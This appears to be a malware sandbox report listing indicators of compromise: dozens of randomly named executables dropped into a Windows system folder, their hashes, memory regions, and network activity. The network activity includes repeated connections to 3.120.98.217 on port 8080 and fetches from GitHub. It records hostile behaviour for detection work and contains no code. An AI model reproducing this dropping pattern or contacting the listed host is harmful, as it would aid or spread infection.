C:\Windows\System\zbsYvNB.exe

C:\Windows\System\zbsYvNB.exe

C:\Windows\System\gPLLfZQ.exe

C:\Windows\System\gPLLfZQ.exe

C:\Windows\System\PyQbVhy.exe

C:\Windows\System\PyQbVhy.exe

C:\Windows\System\dsDCfUw.exe

C:\Windows\System\dsDCfUw.exe

C:\Windows\System\AFdaLHE.exe

C:\Windows\System\AFdaLHE.exe

C:\Windows\System\fAbhCva.exe

C:\Windows\System\fAbhCva.exe

C:\Windows\System\aWtENhJ.exe

C:\Windows\System\aWtENhJ.exe

C:\Windows\System\uGgkkTP.exe

C:\Windows\System\uGgkkTP.exe

C:\Windows\System\TkglMCz.exe

C:\Windows\System\TkglMCz.exe

C:\Windows\System\mRsCFNf.exe

C:\Windows\System\mRsCFNf.exe

C:\Windows\System\QVspsDM.exe

C:\Windows\System\QVspsDM.exe

C:\Windows\System\camPPjx.exe

C:\Windows\System\camPPjx.exe

C:\Windows\System\NPteoqM.exe

C:\Windows\System\NPteoqM.exe

C:\Windows\System\KLqtfUn.exe

C:\Windows\System\KLqtfUn.exe

C:\Windows\System\QuHBQVd.exe

C:\Windows\System\QuHBQVd.exe

C:\Windows\System\TtnjVup.exe

C:\Windows\System\TtnjVup.exe

C:\Windows\System\WYIDhZM.exe

C:\Windows\System\WYIDhZM.exe

C:\Windows\System\lEMoZcl.exe

C:\Windows\System\lEMoZcl.exe

C:\Windows\System\dJHJxhV.exe

C:\Windows\System\dJHJxhV.exe

C:\Windows\System\ZicxsnA.exe

C:\Windows\System\ZicxsnA.exe

C:\Windows\System\KRdxhug.exe

C:\Windows\System\KRdxhug.exe

C:\Windows\System\ttIDiNL.exe

C:\Windows\System\ttIDiNL.exe

C:\Windows\System\RXkcLHW.exe

C:\Windows\System\RXkcLHW.exe

C:\Windows\System\AFRAjak.exe

C:\Windows\System\AFRAjak.exe

C:\Windows\System\pvjQKJQ.exe

C:\Windows\System\pvjQKJQ.exe

C:\Windows\System\HcGuzUk.exe

C:\Windows\System\HcGuzUk.exe

C:\Windows\System\yZNPAYL.exe

C:\Windows\System\yZNPAYL.exe

C:\Windows\System\lViFgOd.exe

C:\Windows\System\lViFgOd.exe

C:\Windows\System\mcxgaHT.exe

C:\Windows\System\mcxgaHT.exe

C:\Windows\System\wwNthVh.exe

C:\Windows\System\wwNthVh.exe

C:\Windows\System\zdUUHvo.exe

C:\Windows\System\zdUUHvo.exe

C:\Windows\System\MNwGcDS.exe

C:\Windows\System\MNwGcDS.exe

C:\Windows\System\mNCzxWo.exe

C:\Windows\System\mNCzxWo.exe

C:\Windows\System\epZZpUH.exe

C:\Windows\System\epZZpUH.exe

C:\Windows\System\IUKsewn.exe

C:\Windows\System\IUKsewn.exe

C:\Windows\System\NJPJdEG.exe

C:\Windows\System\NJPJdEG.exe

C:\Windows\System\rvXERbd.exe

C:\Windows\System\rvXERbd.exe

C:\Windows\System\KxTMjZo.exe

C:\Windows\System\KxTMjZo.exe

C:\Windows\System\hysshcY.exe

C:\Windows\System\hysshcY.exe

C:\Windows\System\HyLwlds.exe

C:\Windows\System\HyLwlds.exe

C:\Windows\System\HKvjAai.exe

C:\Windows\System\HKvjAai.exe

C:\Windows\System\UXHiFbq.exe

C:\Windows\System\UXHiFbq.exe

C:\Windows\System\yPHHLne.exe

C:\Windows\System\yPHHLne.exe

C:\Windows\System\NENxUHN.exe

C:\Windows\System\NENxUHN.exe

C:\Windows\System\niFWlfA.exe

C:\Windows\System\niFWlfA.exe

C:\Windows\System\Nnrqrad.exe

C:\Windows\System\Nnrqrad.exe

C:\Windows\System\xRrKMTG.exe

C:\Windows\System\xRrKMTG.exe

C:\Windows\System\mMFpjAS.exe

C:\Windows\System\mMFpjAS.exe

C:\Windows\System\eiXAAsg.exe

C:\Windows\System\eiXAAsg.exe

C:\Windows\System\LZAsZAw.exe

C:\Windows\System\LZAsZAw.exe

C:\Windows\System\Ursxrhi.exe

C:\Windows\System\Ursxrhi.exe

C:\Windows\System\CNwNvDM.exe

C:\Windows\System\CNwNvDM.exe

C:\Windows\System\GfRNsgp.exe

C:\Windows\System\GfRNsgp.exe

C:\Windows\System\rYfdsHJ.exe

C:\Windows\System\rYfdsHJ.exe

C:\Windows\System\begJOUJ.exe

C:\Windows\System\begJOUJ.exe

C:\Windows\System\STanPEM.exe

C:\Windows\System\STanPEM.exe

C:\Windows\System\XkPbsGJ.exe

C:\Windows\System\XkPbsGJ.exe

C:\Windows\System\DLelsll.exe

C:\Windows\System\DLelsll.exe

C:\Windows\System\VMaNfnx.exe

C:\Windows\System\VMaNfnx.exe

C:\Windows\System\pCsUMku.exe

C:\Windows\System\pCsUMku.exe

C:\Windows\System\bsVSFjZ.exe

C:\Windows\System\bsVSFjZ.exe

C:\Windows\System\bBOgUuK.exe

C:\Windows\System\bBOgUuK.exe

C:\Windows\System\kLwfiqV.exe

C:\Windows\System\kLwfiqV.exe

C:\Windows\System\AIxdyUW.exe

C:\Windows\System\AIxdyUW.exe

C:\Windows\System\VsWfNrH.exe

C:\Windows\System\VsWfNrH.exe

C:\Windows\System\xpylDdA.exe

C:\Windows\System\xpylDdA.exe

C:\Windows\System\rwNvRMD.exe

C:\Windows\System\rwNvRMD.exe

C:\Windows\System\tARIvSK.exe

C:\Windows\System\tARIvSK.exe

C:\Windows\System\yfXeltj.exe

C:\Windows\System\yfXeltj.exe

C:\Windows\System\qxRXWCJ.exe

C:\Windows\System\qxRXWCJ.exe

C:\Windows\System\MfpqVem.exe

C:\Windows\System\MfpqVem.exe

C:\Windows\System\GKLCGAs.exe

C:\Windows\System\GKLCGAs.exe

C:\Windows\System\gbyvNde.exe

C:\Windows\System\gbyvNde.exe

C:\Windows\System\iBgfjOF.exe

C:\Windows\System\iBgfjOF.exe

C:\Windows\System\BCtOeza.exe

C:\Windows\System\BCtOeza.exe

C:\Windows\System\HpAKlzs.exe

C:\Windows\System\HpAKlzs.exe

C:\Windows\System\UQHXsst.exe

C:\Windows\System\UQHXsst.exe

C:\Windows\System\vjMpQaj.exe

C:\Windows\System\vjMpQaj.exe

C:\Windows\System\RpelGmn.exe

C:\Windows\System\RpelGmn.exe

C:\Windows\System\YtFCGQn.exe

C:\Windows\System\YtFCGQn.exe

C:\Windows\System\MjhZjxC.exe

C:\Windows\System\MjhZjxC.exe

C:\Windows\System\LOFgXJC.exe

C:\Windows\System\LOFgXJC.exe

C:\Windows\System\CPfSBBP.exe

C:\Windows\System\CPfSBBP.exe

C:\Windows\System\mkWnckA.exe

C:\Windows\System\mkWnckA.exe

C:\Windows\System\zCdmyzn.exe

C:\Windows\System\zCdmyzn.exe

C:\Windows\System\mzazGeJ.exe

C:\Windows\System\mzazGeJ.exe

C:\Windows\System\gJicOxj.exe

C:\Windows\System\gJicOxj.exe

C:\Windows\System\EsBiXql.exe

C:\Windows\System\EsBiXql.exe

C:\Windows\System\oIVikTF.exe

C:\Windows\System\oIVikTF.exe

C:\Windows\System\WwKsCRx.exe

C:\Windows\System\WwKsCRx.exe

C:\Windows\System\YFdUoAT.exe

C:\Windows\System\YFdUoAT.exe

C:\Windows\System\qYEoDPI.exe

C:\Windows\System\qYEoDPI.exe

C:\Windows\System\KIHLVhW.exe

C:\Windows\System\KIHLVhW.exe

C:\Windows\System\SZfTSnQ.exe

C:\Windows\System\SZfTSnQ.exe

C:\Windows\System\zYkmOAF.exe

C:\Windows\System\zYkmOAF.exe

C:\Windows\System\BfxSsFV.exe

C:\Windows\System\BfxSsFV.exe

C:\Windows\System\DvwNoua.exe

C:\Windows\System\DvwNoua.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/5076-0-0x00007FF7E84F0000-0x00007FF7E88E2000-memory.dmp

memory/5076-1-0x0000024206CE0000-0x0000024206CF0000-memory.dmp

C:\Windows\System\oMLDXpY.exe

MD5 e1ee71077c369a6bc9d5940a26538248
SHA1 67030bf135b9a4c85abcbdf153bcaea99cca985e
SHA256 c0a4553e3e8a0557088efd23aaadef606f90350700a47d5f0be0fc0d9a7caff5
SHA512 6e603d237319c10280c587fd8f25f81970ead5df759a24a2a07136b3e53659479d177a1fd5230d443169d3ae1537e019f3b877b84a37434c0293b44ad6e41d56

C:\Windows\System\Jvoylpo.exe

MD5 32bccdc3ea26a3038f6da8ca8d7ec08f
SHA1 3b82a8c84590a7408a21f9bc83205622d444a7dd
SHA256 b8ec677988a5b9b903cb05f2170414d7ea9396cc6fa15fd58a163767e8d224e8
SHA512 9129a2ee26bb9adf9fce6d504b87d8e465d51cd056b2d24c573a0dc02a102d088017be141a960c0d0f76f8eab71f6b68496ca518f2faf9756e5eec87c7f8415b

C:\Windows\System\fpfJhZN.exe

MD5 bec4bcf9d5aae0799c56d714dfad8127
SHA1 a0e1e11980f7c0c0a91816ab2aa51db5f617c29d
SHA256 16f9e92aaa00b16794a1437c9212872854727d6c7a0e8069d9f1658e43795d64
SHA512 9e4266a5b1d8078525092c5cab5451a681e959e988f455632ca06e0fcaba2ce20e189002d844d0f4ceeb8ab32f973590d5e94ca0a8a3baafd44ec305b33375c5

C:\Windows\System\hWUnCgR.exe

MD5 ed597d5567e30cd4f62a7e0a3faa5f89
SHA1 cbab1fc0ec6add411308d9c74875ded046aa1012
SHA256 7bf94a9d030a3a9d54dc0981149afa757cd165dd26a67e896476e4e411dba930
SHA512 20d8ece81119d8cb7cf45a9952106c3448aa4fce7fa256068e42269520bf72e62193925c4d16d6e661c77e00bab6708054c7460236557f9acbf12bb1ab64ee09

C:\Windows\System\bQGmqDs.exe

MD5 210683e3f9a1fd65caa355ca71742abd
SHA1 47da6a7d17ed54acdbf3a6a2fb76a719d55f4bde
SHA256 d951d9d57643b70598f04e906a0bcb876caf7e3b17c2e0db07f27ad7a9ba71f4
SHA512 1184253915a399674fe7a50a1b92fc719d5ad12d9291a518adb137c4c202a88d9ecccfce1c88e9ba24fd96e17b63caf740b34af2942b5e915178a7b16dcd2225

C:\Windows\System\RjsacaJ.exe

MD5 82d6bd2df414fc46f46188e702cfe192
SHA1 9c6c0ab376b817b1e3c0214304ae082b5d53d81e
SHA256 8fed5bc4bf2ba409871247d25813c7b7bddea0ae25527cc3459d843d9c896a6b
SHA512 e77a56317bd98921738e200185e6a4f4c0762d6dbc88fd5f147efa5f3c66b2ba8a6c8d317f69937b8a6ffcf0e1ab5a5d66e3b440ac42e4ccf26914ec726d11cf

C:\Windows\System\KLcVAHy.exe

MD5 65cd69d175d3862781220e2b03912ab8
SHA1 92d47b86df9718a45f23535fd8398d07d615402f
SHA256 83567c1de3049b19bcd1287199e35d75616d55e85531d34f7710bae2604d336c
SHA512 ea97b567d7b53e73f803556586693de05f948f8de537b3bf3df63b712ac93372aa47a7c52028bd70779e7a17cd588ae5312b3da6f6c3d065c0de53e4a9080f8a

memory/1140-51-0x00007FF6C18C0000-0x00007FF6C1CB2000-memory.dmp

memory/384-48-0x00007FF6264F0000-0x00007FF6268E2000-memory.dmp

memory/2328-86-0x00007FF7589D0000-0x00007FF758DC2000-memory.dmp

memory/1976-101-0x00007FF613220000-0x00007FF613612000-memory.dmp

C:\Windows\System\lVErAaq.exe

MD5 1900bffd6c816026a0153f2ed87ac4c9
SHA1 4712122b6e93fd11b26557554f40fb83f52dba83
SHA256 691626fd480952c520dd75a96d9a1de6f3a06bc371b6d2eca94d3973404b4dd6
SHA512 270a81f4004ee196b08b22b58ad06fd793ee15108f98b320275444439d29451a29161c11ccc50b942b0dc3c3184986c504ab83cce980110ecd2e8caae45293e7

C:\Windows\System\dzgoZLU.exe

MD5 9317bbb196c5213aba297b07f3de8e3b
SHA1 50ecd16002ca993ec556f970fb2ee0aead5c46b8
SHA256 45f88548e6a2b5d8cd0c8c50953ed49685553a22f84ebf3a54d56171a78e4812
SHA512 e1491a04647d58f4107fde0d1221b7229e5e04132d77748a18e7c4071cae97db452d42a9b656b01c14afaf41afd057514bcdb82ea4f96a08a9bc1115da79a0d6

C:\Windows\System\xbBXeac.exe

MD5 9fb0732d5bb56c81490d2e64422fa180
SHA1 2122d81aca58e1d33648716abed45c38422da859
SHA256 d54d1cc3a2983eabcc7dfd5edb42ca8055b891adc7c1619e0b6bec2aca4cafa7
SHA512 61dba93f554d0baf92eff3781ee9620fb4658ec04f78012dd445bd30668cf4e51ec298cc9a75d858893223fb7d4e1ffcc29defca378d6799f3717d1ec006266a

C:\Windows\System\vkFfbig.exe

MD5 f05f28e40b5a6e0ae1110be4c3b2e768
SHA1 7af6a28665d09f564515000e318cc742ce735e0a
SHA256 fdbbbaac5ac35cfbf3396bd718e8f0f9dcc856b96619f04839809adc31ea4cc8
SHA512 673c19370d0ca6509d0b6df1dbbd769fc0d9c79b0df1a184a8ec03e02739816692198750fd4315e918261649ee4218085c5d9ef4c99c1e4593d27ee9196223dc

C:\Windows\System\rKNkxMb.exe

MD5 6335c7aa6562eab14a1fc8709dc59ffd
SHA1 3d4aadcc57420a19efb1c3e5f218807656f5ccd1
SHA256 f333cfb8c69b59d483a4fab2dc083adb7f7193f04093296efab575b278cd6879
SHA512 45d03693873763205e10a63191d8f3a04344efc53d08f5f5c1f9e09218e382bccb128699e967db9ed21c405aa128ee4cae7a96fd1937d0a969f6e64adbb6f30b

C:\Windows\System\KRXBWIS.exe

MD5 219d4a2872b7d9917aba0d4cce5abfbe
SHA1 e63b4c22961220b30893e6d0f89cc5e45c7ba496
SHA256 083f99822261b4145adfa3b7232b7471e4ce28193701bfe378013062a7e04ab5
SHA512 912b2f060418f34ad020ec51cbf05e521e47787fed2076c465c27c7c564f65dd5b792fc2a9a9d34e89909a7083af11ccf451fd85bd5a916e8e92e2e7c0962ef5

memory/3816-470-0x0000011348560000-0x0000011348D06000-memory.dmp

memory/3904-213-0x00007FF67EC50000-0x00007FF67F042000-memory.dmp

memory/4828-209-0x00007FF7F12D0000-0x00007FF7F16C2000-memory.dmp

memory/3136-202-0x00007FF66B670000-0x00007FF66BA62000-memory.dmp

C:\Windows\System\XISNVfW.exe

MD5 320002fb80d758d3758dfe5c0dc72664
SHA1 7b5e1a7517286f9fc9c7c85a805162ebb826e4f1
SHA256 b2557f04287ab01ae26b2ba3de39669382bbb83dc83578863edd29da5e8a98ec
SHA512 cd99622c12da240d905f4be0f755329a61d5b987a51881e99f8bc9b5ddf8475f522059963bd14f3831ca1c4a9ea99274bc56feae40e421bfee464bc6afc08046

memory/2936-193-0x00007FF63D360000-0x00007FF63D752000-memory.dmp

C:\Windows\System\dQTxAmp.exe

MD5 8cdf8112193972561efdc78f1542a089
SHA1 415263394b6bfafa9894cc206eb4b9687b337e9f
SHA256 e302a8ea8a9f73be985e344e0ef89d88e4b2335ef844d3a7edd374191e5c5def
SHA512 a0fbd686c284cc6308106ded2d5d81c9cf4cae6cddd71d4435851857b27cbedfa6b3787fa96984fb576de1974c0436d8194160d71eb55b2a269ad5eec830f7f3

C:\Windows\System\HWyoeMX.exe

MD5 06ad9702cc0373b6ec98b0f541cacfef
SHA1 713545c6ce592e5a0c0bd7e0b0d18e0926e0beba
SHA256 66d61c1b2df918ef46ee05a0fc88b2f79b8a12d6e73f622919cb8dcae6877fec
SHA512 c066d808201b7b4d907266433fee8ce05c13af754b8db4f7979739a9eb5f2a274d3e253e41b6630853a586b6fb5b6b53d5c9a1c9d3f439b59a70678335785de2

memory/2204-182-0x00007FF6D87C0000-0x00007FF6D8BB2000-memory.dmp

memory/4728-176-0x00007FF762AF0000-0x00007FF762EE2000-memory.dmp

C:\Windows\System\yEgAAJb.exe

MD5 8d932c2ca192cd959952c509067033ab
SHA1 e9013f8d3ddf0b054e769316e3e38466725d788a
SHA256 86a8025ab90ac507dd171c6107a3587fdeb4235b715b16a088001313900d8bed
SHA512 47fbadc52e46f38f68398163d1a0c81446b2383a64f913d33026c6cd90a2c547325d943080b3a48bd0067195a2db132eb4272a00a69853ca9710e32097cb05e0

C:\Windows\System\xXhBCyi.exe

MD5 1e2c81db0faa0f7bd5500fc33d4e1610
SHA1 042779d4df6e9d01720ed53e84578e24bec37013
SHA256 81ff07851e5cc28961f70994193e8a60005f350bab548c8e8b443050fffee3d3
SHA512 3c0606b96d9a764d98df387e7d2709d38a5b1760448959a933046a34b521df9de0102db67aeed298e96da32dcd4370af6e8ac842d442630e0d1aabe59dff16c6

memory/3292-165-0x00007FF695DD0000-0x00007FF6961C2000-memory.dmp

C:\Windows\System\gGhCRUh.exe

MD5 9d46bc799b26c392dcb143600be2e6f4
SHA1 abe3f2b2789f50b7401b7b97347455e929f72189
SHA256 37735521d0b9577528deee13ae6712713829cc24ca9b6a71a93d276256e11df7
SHA512 b457d441540f9013f3dbeac5af9f6fa619fcd45c314b4d08728a87315d8e73cbdeef872b86fea290f48014bb85999760a9284a1b274d66f4f515a73246db2653

C:\Windows\System\JYIkKUo.exe

MD5 08a9297638c8bd55bd50e668e2175512
SHA1 501e3c7f5e2aab4df797545b66efbf2bfdbbbca7
SHA256 fed041157666a555a2c0e7f454d123ecf82af888df92487128e71251f4a1d0fb
SHA512 4b98340c6a2356712a409e067437866a3ae919dd011c047eeb36a96631e0d23c43f918f8fa7c039ec030dbd08ca80d850de95e5b56605ef334113970c71e2850

memory/2904-154-0x00007FF695DA0000-0x00007FF696192000-memory.dmp

memory/2000-148-0x00007FF6CC7C0000-0x00007FF6CCBB2000-memory.dmp

C:\Windows\System\hlHUBLi.exe

MD5 006d8e36cda02c7efae1dfad969a4b90
SHA1 2dbd9f3ee630dd1f3e50905cab530453a99607d1
SHA256 bdcb2039fc55a67e307ca9074856e735b044e72156ed07c7a2e4dd838579706e
SHA512 ee79bf44fb2272a1dc1f194eb6a6d5a3ba084c2ad6cdd60371da99366b036dd153341b114b337246a0e66393e1d911a31736f8a79fa2f93c36cde87f645b0839

memory/1296-142-0x00007FF6147F0000-0x00007FF614BE2000-memory.dmp

memory/3236-138-0x00007FF7E31F0000-0x00007FF7E35E2000-memory.dmp

C:\Windows\System\lFIifHV.exe

MD5 7bc5403901301b6144c18f6e20fa0c77
SHA1 86cf02b25e925c3506d3b525abb1d4db4567ac31
SHA256 e6c291eafcf26b5caa2e9b61ed5f97a575aec242f7c429f8992adde2bdb6c7f1
SHA512 6e760b4b2e58aed560c6f61112fb3147ae284bc5e33030f68fa3c0f11e48f3af1c284efaaa57065be606f1bb4b7414b99f07c6cbb04f4e3a963b7bfb56482e04

C:\Windows\System\TQwLsYt.exe

MD5 baf5d1468c1d4776c37adf1a7def0eef
SHA1 abaad92137437f34760ab431d85913ccd82a729a
SHA256 48f76b409908fd30557e90f5c35712ac67788cde0f1759cb4f6d613b34d3ab45
SHA512 4cd3a83b556ba3660c0b351ed5869c26b53105717fa543a40c7d5da15d42759dae2bc8dd5cb4ca474d21026fa0517e5c582c14db7676d4840e2fee3ea8d359ef

memory/2200-126-0x00007FF7177A0000-0x00007FF717B92000-memory.dmp

C:\Windows\System\XSTWMcU.exe

MD5 584674b1b2faccec75a8db96d72c79d2
SHA1 8f29a926bf28eaebf1e606592c3a454156f4a0a4
SHA256 45b9bfb5f84a61707c344caeb72486243d66e4180be27cc6d22d9e9fe2e70f04
SHA512 d75f10361f59a5e54c20677fd4b0245070b93eb4b1a4561b00cb269188ef84d54f5532dab529ba7f8992b1123bb06373039b541081c8ff09660342d8c0c700a1

memory/3212-120-0x00007FF7C8AA0000-0x00007FF7C8E92000-memory.dmp

C:\Windows\System\LGdkhVO.exe

MD5 0bdf91f743d1c031543054d9c80e948b
SHA1 c58ad03f573ea1e7062ee649b2d22a31a8d3d27f
SHA256 ca14fd8bd12802e822850a4baf98e99ba7065e6cede27beb815209fed5b0f048
SHA512 06845d027612ea5c91e9c855acd6694903985a762adaf1110eed29ee3ce62b098dd6a7c7a5c3d8773b290daec305487aa71b1d77582cb3268de8cb5bbedfd480

memory/372-113-0x00007FF6D0AD0000-0x00007FF6D0EC2000-memory.dmp

memory/4072-109-0x00007FF6FF220000-0x00007FF6FF612000-memory.dmp

C:\Windows\System\yUpMrha.exe

MD5 4f9e6e02d5b38f1d4da0eeef4c707af6
SHA1 227a8260fbfdfab51cc5ee5e70abed604255b572
SHA256 c35c35fa9bebabae1c9731e32109f1e4ddfed09c685cc7055e49d370cb0cc11c
SHA512 f45aa2f6fbda724060d99fadb76be59c4958e13b92142eeb9f63fe6332e179609fa6b0e155843546e6dcc1c5c4fef2bafcf1007b28f7ec5e1e0514bf31fd08c6

C:\Windows\System\KyYyQCe.exe

MD5 665ecd77aa7e6afa03468fa38ff7d29c
SHA1 e507c7e0824e71d4034da9fc3801b58b39cbb627
SHA256 5f3de527a79f5e4ae01103cecff87c91e653aaaf3ba98f9370e09a4e5dcf39d0
SHA512 578dd37b018eb8d85869d37ac89e948b143e9472619178e7035f855d21ea0458a6fe1b127d463328b29b5b9a1dfd63e582f11085a8244a00e4928263af125042

C:\Windows\System\zRORSfh.exe

MD5 088689df36c08aa14c98104fdb75f0b4
SHA1 00263aa7b24de5814721dc1cc6ee5a5d86533318
SHA256 f9365b14ef58eb8e009cb0733089b94dbcecad26b84fbfc582d4dd28e701a6a9
SHA512 21d676b7fb76d7ab4b481ea59ebb96eaf608c01839ae67f46215f30dbe771238baff8af19e3d8c310fa46032d334a72e30f9bdf3bf2efd2f7ab4455bd6bcfd8b

C:\Windows\System\VigWBwe.exe

MD5 c3c77ec5f183ceb5fbe11936581ac127
SHA1 515142a69b93f800be41bb3f57f5aae498035122
SHA256 81874d410b72ad9b192cf9afe4435dfbffba3c13ffd16bedc24fd3df8b7066d8
SHA512 924a2b26f015a130ac693d5fe4726bca22e70deff00e8ec1abc1be28015d7e49eef202b5d0da75fddc8c9a494cc24a125a8513ceb9ae158f00ad7716b70460e2

C:\Windows\System\mATRJEd.exe

MD5 879211097c035769a1d2a4084ed97eef
SHA1 0dca0092a096522434ec3a535551c208cff745b2
SHA256 f8b34963479fa02f7ea1d351aef77a8d34304b033819d59a99380aae8af80214
SHA512 ab93c69a3b04e0f4dea96c7f42bedbde348e16b716ab56ffd7ee83d65970e6de110a9856afc5a57ae02205b8a73a3941bd67bac73b5c97283dd79dd7d0c93924

memory/4228-80-0x00007FF794670000-0x00007FF794A62000-memory.dmp

memory/4680-70-0x00007FF721E10000-0x00007FF722202000-memory.dmp

memory/3816-66-0x000001132F450000-0x000001132F472000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5b5atkb1.lki.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\rHHLJfh.exe

MD5 eb72a8486f20b33bac22a41b7ac684b8
SHA1 a03c67c6af207280b98ea23e5359efae6195a6fb
SHA256 94c86387a2b79c9c550f0def081fc940b840d713ae313d2fd1cc53860d977c8a
SHA512 5d087bd3ceb76fab7ff0ddda6cfcc2c79259b8d052d846fc071fbb233e8214fda1b4bd243d4c1711dc6ee76eb99e4c577b49bdc4b1a86a03c4481030e59709ce

C:\Windows\System\bZYeUPE.exe

MD5 2a3fc682dc85ecd6a212d18e52706607
SHA1 5c72dcee2deb8ffc4f22478ce7709c5e774cc58a
SHA256 697932d05b563aadf487ba3490c0f1d108884b090daff76b0def33fee364bfda
SHA512 d1e5dba45f02c8922da4d5d47c686dda39e6889c2624d324f0ae397be8816e86816b7ccb9a5097c6db2f8d6cabee96fb559f7748d154ebb86afa8d6f044e9f90

memory/4948-27-0x00007FF72E500000-0x00007FF72E8F2000-memory.dmp

memory/5016-16-0x00007FF6E88E0000-0x00007FF6E8CD2000-memory.dmp

memory/3816-18-0x00007FF9A4673000-0x00007FF9A4675000-memory.dmp

C:\Windows\System\RzQbsUy.exe

MD5 3ca51d0354fcf852e9b98c3f31363291
SHA1 2aff4f0b5669b0e18e053029b47d5f8deaab12a8
SHA256 01c2ce2453adea9f627ef64e967906e953e17e38e5b63c0e2f7e52b4190ec709
SHA512 8e269ed672c89f195c4ece460eec754185d790a544158f668babcb39498fa7f9fd22c4dfbf28512651886b0ca3b19df422ee87ba39b7baf286812cf72e666fbb

memory/3816-12-0x000001132F440000-0x000001132F450000-memory.dmp

memory/2088-8-0x00007FF7120D0000-0x00007FF7124C2000-memory.dmp

C:\Windows\System\QMgGxwO.exe

MD5 4585af961e6be7f3b03d075298565b62
SHA1 8e84c60639225761f581ea4ec1ff9a2d8e5472c9
SHA256 b8920be4ca9181e84576dfb449141c7d9af40d7ddc5588ea3cac8c68ef3a0a88
SHA512 aca862ef42a6056537a17dcbf9d8778efa38fbecbcb6ce3dce02a2eb0f5b9ffb56a667b21c26a29159a0ebcd14d21a77c5b25a36880c46863acba28da90e75f0

memory/5016-2487-0x00007FF6E88E0000-0x00007FF6E8CD2000-memory.dmp

memory/4948-2625-0x00007FF72E500000-0x00007FF72E8F2000-memory.dmp

memory/1140-2630-0x00007FF6C18C0000-0x00007FF6C1CB2000-memory.dmp

memory/4680-2637-0x00007FF721E10000-0x00007FF722202000-memory.dmp

memory/4228-2638-0x00007FF794670000-0x00007FF794A62000-memory.dmp

memory/3236-2644-0x00007FF7E31F0000-0x00007FF7E35E2000-memory.dmp

memory/1976-2669-0x00007FF613220000-0x00007FF613612000-memory.dmp

memory/3212-2698-0x00007FF7C8AA0000-0x00007FF7C8E92000-memory.dmp

memory/2936-2703-0x00007FF63D360000-0x00007FF63D752000-memory.dmp

memory/3136-2706-0x00007FF66B670000-0x00007FF66BA62000-memory.dmp

memory/3904-2721-0x00007FF67EC50000-0x00007FF67F042000-memory.dmp

memory/4828-2715-0x00007FF7F12D0000-0x00007FF7F16C2000-memory.dmp

memory/2200-2695-0x00007FF7177A0000-0x00007FF717B92000-memory.dmp

memory/372-2690-0x00007FF6D0AD0000-0x00007FF6D0EC2000-memory.dmp

memory/2204-2687-0x00007FF6D87C0000-0x00007FF6D8BB2000-memory.dmp

memory/4728-2680-0x00007FF762AF0000-0x00007FF762EE2000-memory.dmp

memory/4072-2672-0x00007FF6FF220000-0x00007FF6FF612000-memory.dmp

memory/2328-2666-0x00007FF7589D0000-0x00007FF758DC2000-memory.dmp

memory/1296-2658-0x00007FF6147F0000-0x00007FF614BE2000-memory.dmp

memory/2000-2654-0x00007FF6CC7C0000-0x00007FF6CCBB2000-memory.dmp

memory/2904-2650-0x00007FF695DA0000-0x00007FF696192000-memory.dmp

memory/3292-2648-0x00007FF695DD0000-0x00007FF6961C2000-memory.dmp